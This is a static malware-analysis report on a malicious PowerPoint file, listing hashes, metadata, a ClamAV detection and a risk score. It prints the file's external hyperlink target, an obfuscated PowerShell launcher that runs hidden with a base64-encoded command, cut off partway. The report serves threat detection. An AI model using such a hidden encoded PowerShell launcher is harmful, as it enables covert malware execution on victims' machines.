Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 94d6e2bbae508d97…

MALICIOUS

Office (OOXML)

File size: 31.1 KB
Created: 2020-09-29 11:18:06 UTC
Authoring application: Microsoft Office PowerPoint 16.0000
First seen: 2020-10-03
MD5: 8dc2b70082bc52466d78851f4056c910
SHA-1: aae6348c832607a88cb193607ccd0a482d45d3b7
SHA-256: 94d6e2bbae508d97f8047bbbd1073772f1663d1942f032c3a288840ccc74c060
Risk Score: 68

Heuristics 2

  • ClamAV: Xml.Exploit.External_Relationship_Abuse-9987932-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xml.Exploit.External_Relationship_Abuse-9987932-1
  • External hyperlinks (1) (severity: low, rule: OOXML_EXTERNAL_HYPERLINKS)
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: powersHell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQ